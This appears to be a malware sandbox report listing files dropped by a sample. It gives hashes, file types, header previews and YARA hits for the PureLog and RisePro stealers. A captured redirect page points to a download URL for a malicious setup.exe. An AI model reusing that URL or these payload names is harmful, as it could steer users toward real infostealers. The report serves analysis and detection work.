Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\setup[1].htm

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	327
Entropy (8bit):	5.28892863195883
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPW6V4SiKRzeZAUyBFEcXaoD:J0+ox0RJWWPzzlwAULma+
MD5:	FD5B42DAB0FAAF3255E7B4E4984CD02A
SHA1:	EF3BDA544E71E4C82AD26298D323B710D7625AF9
SHA-256:	319B673B4227F3D0202D8A6C60D33A50577F48B4E944A1743976003AE5214EEE
SHA-512:	606A821EBBFD1C84C78BDD73DD098A2C26FCEC6325615963BF125BA4792CFBC4FDFF6B1E0127A62B5B66EB806B0140F50145D7F42FCA2C377363ED9879F0986D
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://d.392391234.xyz/525403/setup.exe">here</a>.</p>.<hr>.<address>Apache/2.4.55 (Unix) Server at monoblocked.com Port 80</address>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8060192
Entropy (8bit):	7.987762562512362
Encrypted:	false
SSDEEP:	98304:78X+JC5cCZOdf4SwIO7bwihiz40HbJKqc1oDKZAKRMvRBfRWyTtdl4CqswYfooZT:78F5OhLAMYGJLZMqvbfRWUdXDTPww
MD5:	020E56EC21EE996733D9309348D841EB
SHA1:	757BD41B36AE35153026889BA09DB5AEA37EDDC3
SHA-256:	04E37C9DD04BF56B74127D6E21D9DC107B5BAAE7F689C291B3295B119D323F26
SHA-512:	669F0111226A233B6E848831EDD36476329FCC9C57E292E7BBD103B9AD95014811055111BC62EFE89D727DAA56F994758DFADC1AC467679B07DEDD78B86063CF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......f...z......[J.........@.............................@........{...`..................................................z..P.... ..T...@........Nz. .......X...........................X...(.......8...............X............................text....d.......................... ..`.rdata..............................@..@.data...pDz.........................@....pdata........z.....................@..@.00cfg........{.....................@..@.tls..........{.....................@....vmp.u..... {..................... ..`.vmp.u............................@....vmp.uL!z....."z.................`..h.reloc..X............,z.............@..@.rsrc...T.... .......Bz.............@..@................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Software[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	889599
Entropy (8bit):	7.984770569195122
Encrypted:	false
SSDEEP:	24576:FO+wT8lBiVYAXvTWBWpmnQft6vrmJNMwZsZA4:09wydviopmn5K90A4
MD5:	3962D7FFCCD3834FBEDEF6B6D9E1CCA4
SHA1:	23BEFC283ECF95FF891918EBEA3ACAB1BDF351CE
SHA-256:	885F02FED18354E3318B966A7969B4415088E5ED6DDC124AEFAC517244B658C6
SHA-512:	1157DD78D19EE2BD9D57F991FDCA46294790D86737B66FD43FB1725053F1B9A00E20F3A207D8FA13B727B433C7AF2EAC626E8F2718BFDA6941C4E06EFB9CCCE5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.pD...........................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...pD....;..F..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Space[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5726528
Entropy (8bit):	7.992347531872189
Encrypted:	true
SSDEEP:	98304:jTZxi0wECRGcZrKEMGNvSkiU3i4zHDRj0qoeHRX15cUmEHTA7TVNL/:R0dRGcZ2ibj3/jRYqoehJ07Rt
MD5:	66373AA110A885E380BBA4FFABC8157F
SHA1:	872F9E36181AAAB827E73F8A2FE8AD3CE39AF512
SHA-256:	259E2D31DA2CB44EF19CC18453924EB3C4588EABF51D5182ECAF9D60266CF60D
SHA-512:	13172D98BF316CD22CC211FF01A5FA98F9072D91B34C6CD2E2463B6F45F54C757B00DEC59A0E4681E09B39D2B5DDA2452146F9BFC0A88DF4530BD9757E6D884A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.e...............".............vL...........@...................................W...@...........................K.J....z].@.....................V.@}...p.......................................d..@.............B..............................text...X........................... ..`.rdata...<..........................@..@.data....H...0......................@....vmp...'/......................... ..`.vmp........B.....................@....vmp....V...B...V................. ..`.reloc.......p........V.............@..@.rsrc.................V.............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\XFilePumper[1].bmp

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	data
Category:	dropped
Size (bytes):	206852
Entropy (8bit):	4.538264111306047
Encrypted:	false
SSDEEP:	1536:czXpm08yzliOu1H93rHFw8JQgZzK7+47n3sOBu:czXp/d7Y3zmgA+Mn3sO8
MD5:	2A8B80BE04569278BCDDD514C453D866
SHA1:	338C10B64454A2693B77E42C840E7F3F0F526364
SHA-256:	85CDF5A6503E1881C3B964C2C7CF2DA69EC31B61C9AC65F61A37C611193D3472
SHA-512:	25EB3A88611D7E65EE61327FFF9E535F80913D5D3759F505BC4CF4C8A685B459DEB59BA3C09B70DAA0EFFEF527F0C3AF0033A111F44F71353E5CD121FBCE837B
Malicious:	false
Reputation:	unknown
Preview:	..fUXO......................................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1.......EP..Y.................7...%.............S(...5...........5....................................u..................................)..Z............................u......E)..-............................................5...............5..]...........;apma...Y....5......................5..u;gfgv................5..................;gpyzv.......u.......3.................W................=(......]........3...U...........)..e...........................................O=.....=U...f....=....?..=....?.k....8.g...e.....=....z....f.........k....?.k....?.......?.k....?..=....?Cf....=....a.........?#.=.....=....?.?.........f....f....h.....n....z5...?..%..`........n....z4...=7........z6.....n....z4...=1...5.W...O=0....>....M...z3....=0....=2...8..z=...gV..e=<...3..z?...=<...3..?...........rr..1....%..p.......f>.....gH..ez9....gp..ez8.....z;....g...ez:....g...ez%.....z$...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\crypted[1].bmp

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	data
Category:	dropped
Size (bytes):	285324
Entropy (8bit):	7.719925434664472
Encrypted:	false
SSDEEP:	6144:smiMoozwolEIBMYld73nWJ2NFpKBmRan1/fSxBnuFcmangLPAlM:smiMoBMEI/D7XWJ2NFpKBmRg/fSxpu0O
MD5:	5F0CB1C1F11E3269F1573D4737AD57A4
SHA1:	3276A35689DD7C8441DD027EA67DA314E3B36564
SHA-256:	CDF9710EEC51128C0059586786B625B9EAB512113D4F5CEFC8BCDEEE92332A39
SHA-512:	BB296F71446D037DBE3DEFD34F83874A4DE8FEE136F71380FB125FE75CB6BDFD425C2B08DED9C7CBC5BE7326118BD551EE032F65488F625D1A99756F87170040
Malicious:	false
Reputation:	unknown
Preview:	..fUXO......................................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1.......EP..Y......s.............................4...5...........5....................................u..................................4..^.......]................[...u......,4...............................................5...............5..]...........;apma........5......................5..u;gfgv...]...............................;gpyzv.......u.........................W.................4......]............M...............0...........................................%..C.......k..../^.........=....5....5....5....f....=............=....=....5....*....g...ef....o?..;=^...=....?....?....%.............?....................?....=^...=....5.........0.....=1........?...%.............?........FO.......f....3?....?....=^...?.....?....%.............?T...........8...8............=^...?..=^...?..=^...?..=^...?..=^...?.....?....=^...=...........0.....=1........5.........0...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\setup[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7828164
Entropy (8bit):	7.997130842409362
Encrypted:	true
SSDEEP:	196608:91ODvTJNMJo5k57XO1bBTt+uncBI5w9Us1QP4:3ODbSO35r+ycBkgUs2A
MD5:	2A9FA9F2EFF4AEA3FFBD2407751B7A51
SHA1:	579F6935B3E354AD384D94F3F2B7685824FF33B3
SHA-256:	E8F19D0BA10FE8E99BCC1DBC5DB185BFA619E5853B73554240805E9A6995DBFE
SHA-512:	EEF07120F40FA0CD3359C546B02141EA006F41783DB6420972430BDD2DA9C8EC6F3718A504CE66C96EFA880798AF4C7FA87B8F9798776A87C5DE925262BD240C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\sm[1].bmp

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	data
Category:	dropped
Size (bytes):	4309412
Entropy (8bit):	7.386039310093702
Encrypted:	false
SSDEEP:	98304:0s7xWJbUCpmc7gzU2LmPJV2DlrAARoR5co6FCO:fxc/UK4Lm32ZMlIIO
MD5:	927656316D4787806FDFD3C2B90DA109
SHA1:	D7D3A301926779F28CA690D587E22E268E64C0A6
SHA-256:	49ECE9FEEA500F72DC4FFB32A7E6AA7285DE92EB947D57CA8BC04108A5EC6767
SHA-512:	B38651EF4523AF1CC2D7ED0C807D0314CE6832C043F300AFDF8DE5214FF6ECE116130957BADFB75630FF14F00719CE34A8BBA9B7DC0C25518D7F60766F7A66C6
Malicious:	false
Reputation:	unknown
Preview:	..fUXO......................................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1.......EP..Y.....................E..W...........u...5...........5.......................uT.......W.....................................eu..^.............................T......................................................5...............5..]...........;apma........5...W..................5..u;gfgv................Q..................;gpyzv........T........................W.................u......]........G...j......V........4...........................................=....?/..=....-.....?.3k.......?...k....?..%..a.......-4.......P....t...-I...f.........-....f.........-....f.........-5...f.........5.....,....35....-....fU........-....?.%...........k....z......-......?-....-......%..1.......-....-....-.....k....z......-......?.%..1.......-......?.k....z......-....-....-.....%..1.......-......?.k....z......-....-....-.....%...........k....z......-....-....-......?.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\0e4bf4bb[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293888
Entropy (8bit):	5.9425444164565215
Encrypted:	false
SSDEEP:	3072:zzuOI8Ak8wluVa+n5dqT44444YKYZxLPqdjLA1zDcAr8MDTgYCmiMAkv8+4z9XOI:v6Pk944444YKSqNszxhALMXv4z9Xk
MD5:	917E3841636183444EC8970D46F1A89A
SHA1:	2923622ABF90A9085219F73256DF8B7BA78F0A89
SHA-256:	6900CB0A36AF370900E5B5E21504F8E931A01F856D8546AEB7676E9497B4FBBF
SHA-512:	1F6C14B8FCFB51C04084C9979CA5938C8F57ABE1F6606034CB34809D3846027EB2F91116AF966E7482115DAF99FFDB2E42471D604B295E3B7D5C122BBA185BF4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...j~.d......................n......<............@...........................o..............................................`..P.... n.................................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data.....l..p...@...V..............@....rsrc........ n.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4371848
Entropy (8bit):	7.9580060885043515
Encrypted:	false
SSDEEP:	98304:Jak2rBgQfQBO+kzrSFtHCULP6tfKPz4QF3r9WIw5oNx+N:Uz5TBz4iULCtkz4QV5Wt5ofc
MD5:	0CF89B056C66BEF40DEDB8AFC4F57EB6
SHA1:	D73AC89A4DA0B120F296E9B0CB591AAA75D811E4
SHA-256:	3949C37BB29511D9D08A8967B10A007B6775AA6AE5FFCD8BF2F939C0614E0D64
SHA-512:	C11018A73AD05029644A4D43839E3E65A7692202E719C40DB5D9AF67F0111A4252F17DE36FA4A3315ED89ED5A34DF99C6FDD7666B8C06F19C9B72B6244744915
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....Qd.....................<.......<............@..........................@........B......................................`..P....P................B.................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data.......p...n@..V..............@....rsrc........P........A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Start[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	278664
Entropy (8bit):	7.762811308800484
Encrypted:	false
SSDEEP:	3072:808fi2s4FpronoEtI/Ev2buZOQXyA5H61/lEB97AS9yAfaAh9z7F4Ry3mvOv2vEC:OVFpekG2bU7sW720L9zRkyWvdvEJnYH
MD5:	1163DFDB973A2054DC853BA3723E0363
SHA1:	EB7A3AC74BAA748CD4700D9B981F31831DD9790F
SHA-256:	FD58FFE7E5760B1A476090D134A79470AA7AEAEDD70E57D608F161EC5841A992
SHA-512:	1D0C550D16921F511475666B3A7D54AB07F31EDC2967C48F8ADEFEA1C04B7B248E27F9ECCF29A83E01E3BB0D93936E2C788BE54FC784FE065E58E1AF9AF1CC24
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Start[1].exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I.f................................. ... ....@.. .......................`............`.....................................K.... ..P................N...@......x................................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H........w..Pt..........@................................................0.......... ........8........E....1.......\|...........8,.......~....(....~....(.... ....?.... ....8....~....(.... .... .... ....s....~....(........ ....~....{l...:v...& ....8k......... ....~....{x...:Q...& ....8F...r...ps....z~....:.... ....8&....(...........(....N.............(....&~..........~.......(.......]....0.......... 2.......8........EW.......................?.......z...........Q...C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.9513873199684735
Encrypted:	false
SSDEEP:	49152:yZMc3Ruw+Oz8bg96lpEXUIxpGKj6hET7PVeQBEJ6OfKxSqJX8ZLMPd:yZMkuw+Oz8g9kpEEIxpRT7PVercpgbZO
MD5:	46C4BF1B012F8B2E5B8F45F4F6FD97F5
SHA1:	00EBBCA9577B0AAE70E7198A61DD2357157E4B88
SHA-256:	4AA6211D1C8A3C67F29079243B48CC36A20D142804A5C2385CECD74DF75D2B69
SHA-512:	B19C84D61A36C9E79C5ED3945C0651970BCE46E6B8B62A22EF299C68D63758109AD3C8B9F73800291A42628A41D4FC0F03A59727774C318E575B496745CA7A86
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L...o..e..............................M...... ....@...........................M...........@.................................V...j.............................M.............................l.M..................................................... . ............................@....rsrc...............................@....idata ............................@... . ,.........................@...iomijoue......2.....................@...cpzudpwp......M.....................@....taggant.0....M.."..................@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4371848
Entropy (8bit):	7.958004117755538
Encrypted:	false
SSDEEP:	98304:Jak2rBgQfQBO+kzrSFtHCULP6tfKPz4QF3r9WIw5oNx+t:Uz5TBz4iULCtkz4QV5Wt5ofE
MD5:	19625E4EEA21C969143C6C5E964D16B1
SHA1:	C16D4769E2C8A3194517C49297BD6573A58EA56E
SHA-256:	E896359AA152C4C3D401E6E2026C559822176AEECF8A14CCAF77DA9AB0662507
SHA-512:	0BAA5DC853BED59C66095C68107668E25DC0685223C6FB6DA0846D9C7716B40913BC30DB2A6B2924FE4F6C5C8D5537B5010499607832E77B68571CF7B613D298
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....Qd.....................<.......<............@..........................@........B......................................`..P....P................B.................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data.......p...n@..V..............@....rsrc........P........A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.9513873199684735
Encrypted:	false
SSDEEP:	49152:yZMc3Ruw+Oz8bg96lpEXUIxpGKj6hET7PVeQBEJ6OfKxSqJX8ZLMPd:yZMkuw+Oz8g9kpEEIxpRT7PVercpgbZO
MD5:	46C4BF1B012F8B2E5B8F45F4F6FD97F5
SHA1:	00EBBCA9577B0AAE70E7198A61DD2357157E4B88
SHA-256:	4AA6211D1C8A3C67F29079243B48CC36A20D142804A5C2385CECD74DF75D2B69
SHA-512:	B19C84D61A36C9E79C5ED3945C0651970BCE46E6B8B62A22EF299C68D63758109AD3C8B9F73800291A42628A41D4FC0F03A59727774C318E575B496745CA7A86
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L...o..e..............................M...... ....@...........................M...........@.................................V...j.............................M.............................l.M..................................................... . ............................@....rsrc...............................@....idata ............................@... . ,.........................@...iomijoue......2.....................@...cpzudpwp......M.....................@....taggant.0....M.."..................@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2FN_tSqExD_WAZJi52lCzdU.zip

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	652188
Entropy (8bit):	7.998196993372392
Encrypted:	true
SSDEEP:	12288:nzCFb3+BWiwmzSl3U5k7SuMn3rdM0rzNp0CKcKBlsmKlf8xxgOAQimC5XRSsjq:nYb+xO3goDM3rdM0rB5mKlfMxgOSksjq
MD5:	5745F313D5CB26EC693C2ACEAA8976A5
SHA1:	6194A2FD02C1BB159F4A611F66735AAB6A27CFE4
SHA-256:	D986F01A6EEE8C0EB8758EF0349DD81E4236DC1F24F6C6B38965F0B052A05198
SHA-512:	58E364EAD855E2C665AD06D7BC6AEC97DA41A1D65EDC2C02007C5AAB6A5B65D7D78F7ED6F4E67000D56F2FC64C571700DF411760ED830A3B556AC71603BE7B50
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\2FN_tSqExD_WAZJi52lCzdU.zip, Author: Joe Security
Reputation:	unknown
